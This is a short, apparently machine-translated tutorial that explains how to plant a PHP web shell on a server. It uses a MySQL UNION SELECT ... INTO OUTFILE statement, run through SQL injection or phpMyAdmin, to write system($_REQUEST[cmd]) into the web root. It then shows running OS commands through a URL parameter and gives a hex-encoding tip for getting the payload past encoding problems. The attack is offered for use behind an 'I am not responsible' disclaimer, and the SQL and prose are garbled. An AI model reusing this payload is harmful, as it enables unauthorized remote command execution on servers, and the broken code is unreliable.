Mysql statement to generate a backdoor Trojan, mysql statement to generate a backdoor
Ke, let's take a look. I am not responsible for the consequences.
SELECT * FROM 'vbb _ strikes 'WHERE 1 union select 2,3, distinct from vbb_strikes into outfile 'C:/inetpub/wwwroot/cmd. php' generate cmd under C:/inetpub/wwwroot/by injecting Mysql or running the above statement in phpmyadmin. php file, the content is the original vbb_strikes content, followed by: 2 3 <? Php system ($ _ REQUEST [cmd]);?>
Again Through http://www.xxx.com/cmd.php? Cmd = dir c: You can execute the system doscommand!
Which sort is what?
Is <? Php system ($ _ REQUEST [cmd]);?> If you do not use this method, other encodings may appear in different SQL versions, such as % xx. Which backdoor cannot be executed! If you have other language names, you can enter them in UltraEdit and press the [Ctrl + H] key to connect the hex in it!
The above is all the content of this article. I hope you will like it.